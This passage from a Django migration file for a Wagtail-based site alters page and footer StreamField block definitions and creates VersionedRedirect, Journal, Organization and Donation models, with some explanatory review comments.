Be careful!')), ('people_block', wagtail.wagtailcore.blocks.StructBlock((('displayStyle', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('concise-team', 'concise-team'), ('concise-ambassador', 'concise-ambassador'), ('detailed', 'detailed')], default='concise')), ('tag', wagtail.wagtailcore.blocks.CharBlock(max_length=20))))), ('centered_text', wagtail.wagtailcore.blocks.StructBlock((('text', wagtail.wagtailcore.blocks.RichTextBlock()),))), ('hero_block', wagtail.wagtailcore.blocks.StructBlock((('image', wagtail.wagtailimages.blocks.ImageChooserBlock(required=True)), ('description', wagtail.wagtailcore.blocks.RichTextBlock(required=True))))), ('spotlight_block', wagtail.wagtailcore.blocks.StructBlock((('bubbles', wagtail.wagtailcore.blocks.StreamBlock((('bubble_block', wagtail.wagtailcore.blocks.StructBlock((('image', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('title', wagtail.wagtailcore.blocks.CharBlock(max_length=35, required=True)), ('description', wagtail.wagtailcore.blocks.RichTextBlock(required=True))))),))),))), ('job_whole_block', wagtail.wagtailcore.blocks.StructBlock(())), ('embed_block', wagtail.wagtailembeds.blocks.EmbedBlock()), ('whitespaceblock', wagtail.wagtailcore.blocks.StructBlock((('height', wagtail.wagtailcore.blocks.IntegerBlock()),))), ('clear_fixblock', wagtail.wagtailcore.blocks.StructBlock(()))), blank=True, null=True),
),
migrations.AlterField(
model_name='custompage',
name='content',
field=wagtail.wagtailcore.fields.StreamField((('appeal', wagtail.wagtailcore.blocks.StructBlock((('icon', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('none', 'none'), ('flask', 'flask'), ('group', 'group'), ('laptop', 'laptop'), ('sitemap', 'sitemap'), ('user', 'user'), ('book', 'book'), ('download', 'download')])), ('topic', wagtail.wagtailcore.blocks.CharBlock(max_length=35, required=True)), ('content', wagtail.wagtailcore.blocks.TextBlock(max_length=255, required=True))), classname='appeal', icon='tick', template='common/blocks/appeal.html')), ('heading', wagtail.wagtailcore.blocks.CharBlock(classname='full title')), ('statement', wagtail.wagtailcore.blocks.CharBlock()), ('paragraph', wagtail.wagtailcore.blocks.RichTextBlock()), ('imagechooser', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('column', common.blocks.columns.RowBlock()), ('tabbed_block', common.blocks.tabs.TabListBlock()), ('image', wagtail.wagtailcore.blocks.StructBlock((('main_image', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('style', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('max-width:225px;max-height:145px', 'Small'), ('max_width:250px;max-height:250px', 'Medium'), ('max_width:250px;max-height:250px;padding-top:20px', 'Medium Pushed Down 20px'), ('height:auto', 'Shrink to Fit')], default='height:auto')), ('url', wagtail.wagtailcore.blocks.CharBlock(max_length=250, required=False))))), ('rich_text', wagtail.wagtailcore.blocks.RichTextBlock()), ('raw_html', wagtail.wagtailcore.blocks.RawHTMLBlock(help_text='With great power comes great responsibility. This HTML is unescaped. 
Be careful!')), ('people_block', wagtail.wagtailcore.blocks.StructBlock((('displayStyle', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('concise-team', 'concise-team'), ('concise-ambassador', 'concise-ambassador'), ('detailed', 'detailed')], default='concise')), ('tag', wagtail.wagtailcore.blocks.CharBlock(max_length=20))))), ('centered_text', wagtail.wagtailcore.blocks.StructBlock((('text', wagtail.wagtailcore.blocks.RichTextBlock()),))), ('hero_block', wagtail.wagtailcore.blocks.StructBlock((('image', wagtail.wagtailimages.blocks.ImageChooserBlock(required=True)), ('description', wagtail.wagtailcore.blocks.RichTextBlock(required=True))))), ('spotlight_block', wagtail.wagtailcore.blocks.StructBlock((('bubbles', wagtail.wagtailcore.blocks.StreamBlock((('bubble_block', wagtail.wagtailcore.blocks.StructBlock((('image', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('title', wagtail.wagtailcore.blocks.CharBlock(max_length=35, required=True)), ('description', wagtail.wagtailcore.blocks.RichTextBlock(required=True))))),))),))), ('job_whole_block', wagtail.wagtailcore.blocks.StructBlock(())), ('embed_block', wagtail.wagtailembeds.blocks.EmbedBlock()), ('whitespaceblock', wagtail.wagtailcore.blocks.StructBlock((('height', wagtail.wagtailcore.blocks.IntegerBlock()),))), ('clear_fixblock', wagtail.wagtailcore.blocks.StructBlock(())), ('code_block', wagtail.wagtailcore.blocks.StructBlock((('language', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('python', 'python'), ('css', 'css'), ('sql', 'sql'), ('javascript', 'javascript'), ('clike', 'clike'), ('markup', 'markup'), ('java', 'java')], default='python')), ('codes', wagtail.wagtailcore.blocks.TextBlock())))), ('calender_blog', wagtail.wagtailcore.blocks.StructBlock((('source', wagtail.wagtailcore.blocks.CharBlock(help_text='Such as: calendar@cos.io', max_length=255, required=True)),)))), blank=True, null=True),
),
migrations.AlterField(
model_name='custompage',
name='content',
field=wagtail.wagtailcore.fields.StreamField((('appeal', wagtail.wagtailcore.blocks.StructBlock((('icon', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('none', 'none'), ('flask', 'flask'), ('group', 'group'), ('laptop', 'laptop'), ('sitemap', 'sitemap'), ('user', 'user'), ('book', 'book'), ('download', 'download')])), ('topic', wagtail.wagtailcore.blocks.CharBlock(max_length=35, required=True)), ('content', wagtail.wagtailcore.blocks.TextBlock(max_length=255, required=True))), classname='appeal', icon='tick', template='common/blocks/appeal.html')), ('heading', wagtail.wagtailcore.blocks.CharBlock(classname='full title')), ('statement', wagtail.wagtailcore.blocks.CharBlock()), ('paragraph', wagtail.wagtailcore.blocks.RichTextBlock()), ('imagechooser', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('column', common.blocks.columns.RowBlock()), ('tabs', wagtail.wagtailcore.blocks.StructBlock((('tab_list', common.blocks.tabs.TabListBlock()), ('tabs_style', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('vertical', 'Vertical'), ('horizontal', 'Horizontal')], default='horizontal'))))), ('image', wagtail.wagtailcore.blocks.StructBlock((('main_image', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('style', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('max-width:225px;max-height:145px', 'Small'), ('max-width:225px;max-height:145px;padding-top:20px', 'Small Pushed Down 20px'), ('max_width:250px;max-height:250px', 'Medium'), ('max_width:250px;max-height:250px;padding-top:20px', 'Medium Pushed Down 20px'), ('height:auto', 'Shrink to Fit')], default='height:auto')), ('url', wagtail.wagtailcore.blocks.CharBlock(max_length=250, required=False))))), ('rich_text', wagtail.wagtailcore.blocks.RichTextBlock()), ('raw_html', wagtail.wagtailcore.blocks.RawHTMLBlock(help_text='With great power comes great responsibility. This HTML is unescaped. 
Be careful!')), ('people_block', wagtail.wagtailcore.blocks.StructBlock((('displayStyle', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('concise-team', 'concise-team'), ('concise-ambassador', 'concise-ambassador'), ('detailed', 'detailed')], default='concise')), ('tag', wagtail.wagtailcore.blocks.CharBlock(max_length=20))))), ('centered_text', wagtail.wagtailcore.blocks.StructBlock((('text', wagtail.wagtailcore.blocks.RichTextBlock()),))), ('hero_block', wagtail.wagtailcore.blocks.StructBlock((('image', wagtail.wagtailimages.blocks.ImageChooserBlock(required=True)), ('description', wagtail.wagtailcore.blocks.RichTextBlock(required=True))))), ('spotlight_block', wagtail.wagtailcore.blocks.StructBlock((('bubbles', wagtail.wagtailcore.blocks.StreamBlock((('bubble_block', wagtail.wagtailcore.blocks.StructBlock((('image', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('title', wagtail.wagtailcore.blocks.CharBlock(max_length=35, required=True)), ('description', wagtail.wagtailcore.blocks.RichTextBlock(required=True))))),))),))), ('job_whole_block', wagtail.wagtailcore.blocks.StructBlock(())), ('embed_block', wagtail.wagtailembeds.blocks.EmbedBlock()), ('whitespaceblock', wagtail.wagtailcore.blocks.StructBlock((('height', wagtail.wagtailcore.blocks.IntegerBlock()),))), ('clear_fixblock', wagtail.wagtailcore.blocks.StructBlock(())), ('code_block', wagtail.wagtailcore.blocks.StructBlock((('language', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('python', 'python'), ('css', 'css'), ('sql', 'sql'), ('javascript', 'javascript'), ('clike', 'clike'), ('markup', 'markup'), ('java', 'java')], default='python')), ('codes', wagtail.wagtailcore.blocks.TextBlock())))), ('calender_blog', wagtail.wagtailcore.blocks.StructBlock((('source', wagtail.wagtailcore.blocks.CharBlock(help_text='Such as: calendar@cos.io', max_length=255, required=True)),)))), blank=True, null=True),
),
# VersionedRedirect: multi-table-inheritance child of wagtailredirects.Redirect
# (see bases=) that adds a ParentalKey to a Wagtail Page so the redirect target
# can participate in page revisions (related_name='versioned_redirects').
migrations.CreateModel(
name='VersionedRedirect',
fields=[
('versioned_redirect_page', modelcluster.fields.ParentalKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='versioned_redirects', to='wagtailcore.Page', verbose_name='redirect to a page')),
# NOTE(review): default=1 on the parent link is a makemigrations artifact for
# pre-existing rows — presumably assumes a Redirect with pk=1 exists; confirm
# before reusing this pattern.
('redirect_ptr', models.OneToOneField(auto_created=True, default=1, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailredirects.Redirect')),
],
bases=('wagtailredirects.redirect',),
),
# Journal: a catalogued journal with a unique title, free-text metadata
# (area/association/publisher), boolean category flags (featured,
# preregistered, registered, special, top), an optional StreamField of
# description+link notes, and an optional URL. Ordered by title and mixed
# into Wagtail search via wagtailsearch.index.Indexed.
migrations.CreateModel(
name='Journal',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=255, unique=True)),
('area', models.CharField(blank=True, max_length=255)),
('association', models.CharField(blank=True, max_length=255)),
('is_featured_journal', models.BooleanField(default=False)),
('is_preregistered_journal', models.BooleanField(default=False)),
('is_registered_journal', models.BooleanField(default=False)),
('is_special_journal', models.BooleanField(default=False)),
('is_top_journal', models.BooleanField(default=False)),
('publisher', models.CharField(blank=True, max_length=255)),
('notes', wagtail.wagtailcore.fields.StreamField((('note', wagtail.wagtailcore.blocks.StructBlock((('description', wagtail.wagtailcore.blocks.CharBlock(max_length=255, required=False)), ('link', wagtail.wagtailcore.blocks.URLBlock(required=False))))),), blank=True)),
('url_link', models.URLField(blank=True)),
],
options={
'ordering': ['title'],
},
bases=(models.Model, wagtail.wagtailsearch.index.Indexed),
),
# Organization: minimal named entity (later migrations in this file add
# logo, partner, url and introduction fields). Ordered by name; searchable
# via wagtailsearch.index.Indexed.
migrations.CreateModel(
name='Organization',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=255)),
],
options={
'ordering': ['name'],
},
bases=(models.Model, wagtail.wagtailsearch.index.Indexed),
),
migrations.AlterField(
model_name='custompage',
name='content',
field=wagtail.wagtailcore.fields.StreamField((('appeal', wagtail.wagtailcore.blocks.StructBlock((('icon', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('none', 'none'), ('flask', 'flask'), ('group', 'group'), ('laptop', 'laptop'), ('sitemap', 'sitemap'), ('user', 'user'), ('book', 'book'), ('download', 'download')])), ('topic', wagtail.wagtailcore.blocks.CharBlock(max_length=35, required=True)), ('content', wagtail.wagtailcore.blocks.TextBlock(max_length=255, required=True))), classname='appeal', icon='tick', template='common/blocks/appeal.html')), ('heading', wagtail.wagtailcore.blocks.CharBlock(classname='full title')), ('statement', wagtail.wagtailcore.blocks.CharBlock()), ('paragraph', wagtail.wagtailcore.blocks.RichTextBlock()), ('imagechooser', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('column', common.blocks.columns.RowBlock()), ('tabs', wagtail.wagtailcore.blocks.StructBlock((('tab_list', common.blocks.tabs.TabListBlock()), ('tabs_style', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('vertical', 'Vertical'), ('horizontal', 'Horizontal')], default='horizontal'))))), ('image', wagtail.wagtailcore.blocks.StructBlock((('main_image', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('style', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('max-width:225px;max-height:145px', 'Small'), ('max-width:225px;max-height:145px;padding-top:20px', 'Small Pushed Down 20px'), ('max_width:250px;max-height:250px', 'Medium'), ('max_width:250px;max-height:250px;padding-top:20px', 'Medium Pushed Down 20px'), ('height:auto', 'Shrink to Fit')], default='height:auto')), ('url', wagtail.wagtailcore.blocks.CharBlock(max_length=250, required=False))))), ('rich_text', wagtail.wagtailcore.blocks.RichTextBlock()), ('raw_html', wagtail.wagtailcore.blocks.RawHTMLBlock(help_text='With great power comes great responsibility. This HTML is unescaped. 
Be careful!')), ('people_block', wagtail.wagtailcore.blocks.StructBlock((('displayStyle', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('concise-team', 'concise-team'), ('concise-ambassador', 'concise-ambassador'), ('detailed', 'detailed')], default='concise-team')), ('tag', wagtail.wagtailcore.blocks.CharBlock(max_length=20))))), ('centered_text', wagtail.wagtailcore.blocks.StructBlock((('text', wagtail.wagtailcore.blocks.RichTextBlock()),))), ('hero_block', wagtail.wagtailcore.blocks.StructBlock((('image', wagtail.wagtailimages.blocks.ImageChooserBlock(required=True)), ('description', wagtail.wagtailcore.blocks.RichTextBlock(required=True))))), ('spotlight_block', wagtail.wagtailcore.blocks.StructBlock((('bubbles', wagtail.wagtailcore.blocks.StreamBlock((('bubble_block', wagtail.wagtailcore.blocks.StructBlock((('image', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('title', wagtail.wagtailcore.blocks.CharBlock(max_length=35, required=True)), ('description', wagtail.wagtailcore.blocks.RichTextBlock(required=True))))),))),))), ('job_whole_block', wagtail.wagtailcore.blocks.StructBlock(())), ('embed_block', wagtail.wagtailembeds.blocks.EmbedBlock()), ('whitespaceblock', wagtail.wagtailcore.blocks.StructBlock((('height', wagtail.wagtailcore.blocks.IntegerBlock()),))), ('clear_fixblock', wagtail.wagtailcore.blocks.StructBlock(())), ('code_block', wagtail.wagtailcore.blocks.StructBlock((('language', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('python', 'python'), ('css', 'css'), ('sql', 'sql'), ('javascript', 'javascript'), ('clike', 'clike'), ('markup', 'markup'), ('java', 'java')], default='python')), ('codes', wagtail.wagtailcore.blocks.TextBlock())))), ('calender_blog', wagtail.wagtailcore.blocks.StructBlock((('source', wagtail.wagtailcore.blocks.CharBlock(help_text='Such as: calendar@cos.io', max_length=255, required=True)),))), ('journal_block', wagtail.wagtailcore.blocks.StructBlock((('displayStyle', 
wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('participating journals', 'participating journals'), ('eligible journals', 'eligible journals'), ('journals signatory', 'journals signatory')], default='participating journals')),)))), blank=True, null=True),
),
# Donation: a dated monetary donation (amount optional/nullable) with a
# rich-text thank-you message, attached to an Organization through a
# ParentalKey (related_name='donations'). Ordered chronologically by date;
# searchable via wagtailsearch.index.Indexed.
migrations.CreateModel(
name='Donation',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('date', models.DateField()),
('amount', models.IntegerField(blank=True, null=True)),
('thank_you_message', wagtail.wagtailcore.fields.RichTextField(blank=True)),
('organization', modelcluster.fields.ParentalKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='donations', to='common.Organization', verbose_name='Organization')),
],
options={
'ordering': ['date'],
},
bases=(models.Model, wagtail.wagtailsearch.index.Indexed),
),
migrations.AlterField(
model_name='custompage',
name='content',
field=wagtail.wagtailcore.fields.StreamField((('appeal', wagtail.wagtailcore.blocks.StructBlock((('icon', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('none', 'none'), ('flask', 'flask'), ('group', 'group'), ('laptop', 'laptop'), ('sitemap', 'sitemap'), ('user', 'user'), ('book', 'book'), ('download', 'download')])), ('topic', wagtail.wagtailcore.blocks.CharBlock(max_length=35, required=True)), ('content', wagtail.wagtailcore.blocks.TextBlock(max_length=255, required=True))), classname='appeal', icon='tick', template='common/blocks/appeal.html')), ('heading', wagtail.wagtailcore.blocks.CharBlock(classname='full title')), ('statement', wagtail.wagtailcore.blocks.CharBlock()), ('paragraph', wagtail.wagtailcore.blocks.RichTextBlock()), ('imagechooser', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('column', common.blocks.columns.RowBlock()), ('tabs', wagtail.wagtailcore.blocks.StructBlock((('tab_list', common.blocks.tabs.TabListBlock()), ('tabs_style', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('vertical', 'Vertical'), ('horizontal', 'Horizontal')], default='horizontal'))))), ('image', wagtail.wagtailcore.blocks.StructBlock((('main_image', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('style', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('max-width:225px;max-height:145px', 'Small'), ('max-width:225px;max-height:145px;padding-top:20px', 'Small Pushed Down 20px'), ('max_width:250px;max-height:250px', 'Medium'), ('max_width:250px;max-height:250px;padding-top:20px', 'Medium Pushed Down 20px'), ('height:auto', 'Shrink to Fit')], default='height:auto')), ('url', wagtail.wagtailcore.blocks.CharBlock(max_length=250, required=False))))), ('rich_text', wagtail.wagtailcore.blocks.RichTextBlock()), ('raw_html', wagtail.wagtailcore.blocks.RawHTMLBlock(help_text='With great power comes great responsibility. This HTML is unescaped. 
Be careful!')), ('people_block', wagtail.wagtailcore.blocks.StructBlock((('displayStyle', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('concise-team', 'concise-team'), ('concise-ambassador', 'concise-ambassador'), ('detailed', 'detailed')], default='concise-team')), ('tag', wagtail.wagtailcore.blocks.CharBlock(max_length=20))))), ('centered_text', wagtail.wagtailcore.blocks.StructBlock((('text', wagtail.wagtailcore.blocks.RichTextBlock()),))), ('hero_block', wagtail.wagtailcore.blocks.StructBlock((('image', wagtail.wagtailimages.blocks.ImageChooserBlock(required=True)), ('description', wagtail.wagtailcore.blocks.RichTextBlock(required=True))))), ('spotlight_block', wagtail.wagtailcore.blocks.StructBlock((('bubbles', wagtail.wagtailcore.blocks.StreamBlock((('bubble_block', wagtail.wagtailcore.blocks.StructBlock((('image', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('title', wagtail.wagtailcore.blocks.CharBlock(max_length=35, required=True)), ('description', wagtail.wagtailcore.blocks.RichTextBlock(required=True))))),))),))), ('job_whole_block', wagtail.wagtailcore.blocks.StructBlock(())), ('embed_block', wagtail.wagtailembeds.blocks.EmbedBlock()), ('whitespaceblock', wagtail.wagtailcore.blocks.StructBlock((('height', wagtail.wagtailcore.blocks.IntegerBlock()),))), ('clear_fixblock', wagtail.wagtailcore.blocks.StructBlock(())), ('code_block', wagtail.wagtailcore.blocks.StructBlock((('language', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('python', 'python'), ('css', 'css'), ('sql', 'sql'), ('javascript', 'javascript'), ('clike', 'clike'), ('markup', 'markup'), ('java', 'java')], default='python')), ('codes', wagtail.wagtailcore.blocks.TextBlock())))), ('calender_blog', wagtail.wagtailcore.blocks.StructBlock((('source', wagtail.wagtailcore.blocks.CharBlock(help_text='Such as: calendar@cos.io', max_length=255, required=True)),))), ('journal_block', wagtail.wagtailcore.blocks.StructBlock((('displayStyle', 
wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('participating journals', 'participating journals'), ('eligible journals', 'eligible journals'), ('journals signatory', 'journals signatory')], default='participating journals')),))), ('render_file', wagtail.wagtailcore.blocks.StructBlock((('file_link', wagtail.wagtailcore.blocks.CharBlock(help_text='Full link to the file on the OSF', max_length=255, required=True)),)))), blank=True, null=True),
),
# Optional logo image for Organization. SET_NULL preserves the Organization
# row if the image is deleted; related_name='+' suppresses the reverse
# accessor on wagtailimages.Image.
migrations.AddField(
model_name='organization',
name='logo',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='wagtailimages.Image'),
),
# Flag marking an Organization as a partner; defaults to False for all
# existing rows.
migrations.AddField(
model_name='organization',
name='partner',
field=models.BooleanField(default=False),
),
migrations.AlterField(
model_name='custompage',
name='content',
field=wagtail.wagtailcore.fields.StreamField((('appeal', wagtail.wagtailcore.blocks.StructBlock((('icon', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('none', 'none'), ('flask', 'flask'), ('group', 'group'), ('laptop', 'laptop'), ('sitemap', 'sitemap'), ('user', 'user'), ('book', 'book'), ('download', 'download')])), ('topic', wagtail.wagtailcore.blocks.CharBlock(max_length=35, required=True)), ('content', wagtail.wagtailcore.blocks.TextBlock(max_length=255, required=True))), classname='appeal', icon='tick', template='common/blocks/appeal.html')), ('heading', wagtail.wagtailcore.blocks.CharBlock(classname='full title')), ('statement', wagtail.wagtailcore.blocks.CharBlock()), ('paragraph', wagtail.wagtailcore.blocks.RichTextBlock()), ('imagechooser', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('column', common.blocks.columns.RowBlock()), ('tabs', wagtail.wagtailcore.blocks.StructBlock((('tab_list', common.blocks.tabs.TabListBlock()), ('tabs_style', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('vertical', 'Vertical'), ('horizontal', 'Horizontal')], default='horizontal'))))), ('image', wagtail.wagtailcore.blocks.StructBlock((('main_image', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('style', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('max-width:225px;max-height:145px', 'Small'), ('max-width:225px;max-height:145px;padding-top:20px', 'Small Pushed Down 20px'), ('max_width:250px;max-height:250px', 'Medium'), ('max_width:250px;max-height:250px;padding-top:20px', 'Medium Pushed Down 20px'), ('height:auto', 'Shrink to Fit')], default='height:auto')), ('url', wagtail.wagtailcore.blocks.CharBlock(max_length=250, required=False))))), ('rich_text', wagtail.wagtailcore.blocks.RichTextBlock()), ('raw_html', wagtail.wagtailcore.blocks.RawHTMLBlock(help_text='With great power comes great responsibility. This HTML is unescaped. 
Be careful!')), ('people_block', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('displayStyle', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('concise-team', 'concise-team'), ('concise-ambassador', 'concise-ambassador'), ('detailed', 'detailed')], default='concise-team')), ('tag', wagtail.wagtailcore.blocks.CharBlock(max_length=20))))), ('centered_text', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('text', wagtail.wagtailcore.blocks.RichTextBlock())))), ('hero_block', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('image', wagtail.wagtailimages.blocks.ImageChooserBlock(required=True)), ('description', wagtail.wagtailcore.blocks.RichTextBlock(required=True))))), ('spotlight_block', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('bubbles', wagtail.wagtailcore.blocks.StreamBlock((('bubble_block', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('image', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('title', wagtail.wagtailcore.blocks.CharBlock(max_length=35, required=True)), ('description', wagtail.wagtailcore.blocks.RichTextBlock(required=True))))),)))))), ('job_whole_block', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)),))), ('embed_block', wagtail.wagtailembeds.blocks.EmbedBlock()), ('whitespaceblock', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('height', wagtail.wagtailcore.blocks.IntegerBlock())))), ('clear_fixblock', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)),))), ('code_block', wagtail.wagtailcore.blocks.StructBlock((('css_style', 
wagtail.wagtailcore.blocks.CharBlock(required=False)), ('language', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('python', 'python'), ('css', 'css'), ('sql', 'sql'), ('javascript', 'javascript'), ('clike', 'clike'), ('markup', 'markup'), ('java', 'java')], default='python')), ('codes', wagtail.wagtailcore.blocks.TextBlock())))), ('calender_blog', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('source', wagtail.wagtailcore.blocks.CharBlock(help_text='Such as: calendar@cos.io', max_length=255, required=True))))), ('journal_block', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('displayStyle', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('participating journals', 'participating journals'), ('eligible journals', 'eligible journals'), ('journals signatory', 'journals signatory')], default='participating journals'))))), ('render_file', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('file_link', wagtail.wagtailcore.blocks.CharBlock(help_text='Full link to the file on the OSF', max_length=255, required=True)))))), blank=True, null=True),
),
# Regenerated StreamField block definitions for Footer.content: adds a
# css_style CharBlock to the google_map, twitter_feed and centered_text
# StructBlocks alongside the existing heading/paragraph/image/columns/
# raw_html/photo_stream blocks.
# NOTE(review): this expression is emitted by makemigrations — do not
# hand-edit; regenerate from the model's current block definitions instead.
migrations.AlterField(
model_name='footer',
name='content',
field=wagtail.wagtailcore.fields.StreamField((('heading', wagtail.wagtailcore.blocks.CharBlock(classname='full title')), ('paragraph', wagtail.wagtailcore.blocks.RichTextBlock()), ('image', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('columns', common.blocks.columns.RowBlock()), ('raw_html', wagtail.wagtailcore.blocks.RawHTMLBlock(help_text='With great power comes great responsibility. This HTML is unescaped. Be careful!')), ('google_map', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('address', wagtail.wagtailcore.blocks.CharBlock(max_length=255, required=True)), ('map_zoom_level', wagtail.wagtailcore.blocks.CharBlock(default=14, max_length=3, required=True))))), ('twitter_feed', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('username', wagtail.wagtailcore.blocks.CharBlock(required=True))))), ('photo_stream', wagtail.wagtailcore.blocks.StructBlock(())), ('centered_text', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('text', wagtail.wagtailcore.blocks.RichTextBlock()))))), blank=True, null=True),
),
migrations.AlterField(
model_name='custompage',
name='content',
field=wagtail.wagtailcore.fields.StreamField((('appeal', wagtail.wagtailcore.blocks.StructBlock((('icon', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('none', 'none'), ('flask', 'flask'), ('group', 'group'), ('laptop', 'laptop'), ('sitemap', 'sitemap'), ('user', 'user'), ('book', 'book'), ('download', 'download')])),))), ('heading', wagtail.wagtailcore.blocks.CharBlock(classname='full title')), ('statement', wagtail.wagtailcore.blocks.CharBlock()), ('paragraph', wagtail.wagtailcore.blocks.RichTextBlock()), ('imagechooser', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('column', common.blocks.columns.RowBlock()), ('tabs', wagtail.wagtailcore.blocks.StructBlock((('tab_list', common.blocks.tabs.TabListBlock()), ('tabs_style', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('vertical', 'Vertical'), ('horizontal', 'Horizontal')], default='horizontal'))))), ('image', wagtail.wagtailcore.blocks.StructBlock((('main_image', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('style', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('max-width:225px;max-height:145px', 'Small'), ('max-width:225px;max-height:145px;padding-top:20px', 'Small Pushed Down 20px'), ('max_width:250px;max-height:250px', 'Medium'), ('max_width:250px;max-height:250px;padding-top:20px', 'Medium Pushed Down 20px'), ('height:auto', 'Shrink to Fit')], default='height:auto')), ('url', wagtail.wagtailcore.blocks.CharBlock(max_length=250, required=False))))), ('rich_text', wagtail.wagtailcore.blocks.RichTextBlock()), ('raw_html', wagtail.wagtailcore.blocks.RawHTMLBlock(help_text='With great power comes great responsibility. This HTML is unescaped. 
Be careful!')), ('people_block', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('displayStyle', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('concise-team', 'concise-team'), ('concise-ambassador', 'concise-ambassador'), ('detailed', 'detailed')], default='concise-team')), ('tag', wagtail.wagtailcore.blocks.CharBlock(max_length=20))))), ('centered_text', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('text', wagtail.wagtailcore.blocks.RichTextBlock())))), ('hero_block', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('image', wagtail.wagtailimages.blocks.ImageChooserBlock(required=True)), ('description', wagtail.wagtailcore.blocks.RichTextBlock(required=True))))), ('spotlight_block', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('bubbles', wagtail.wagtailcore.blocks.StreamBlock((('bubble_block', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('image', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('title', wagtail.wagtailcore.blocks.CharBlock(max_length=35, required=True)), ('description', wagtail.wagtailcore.blocks.RichTextBlock(required=True))))),)))))), ('job_whole_block', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)),))), ('embed_block', wagtail.wagtailembeds.blocks.EmbedBlock()), ('whitespaceblock', 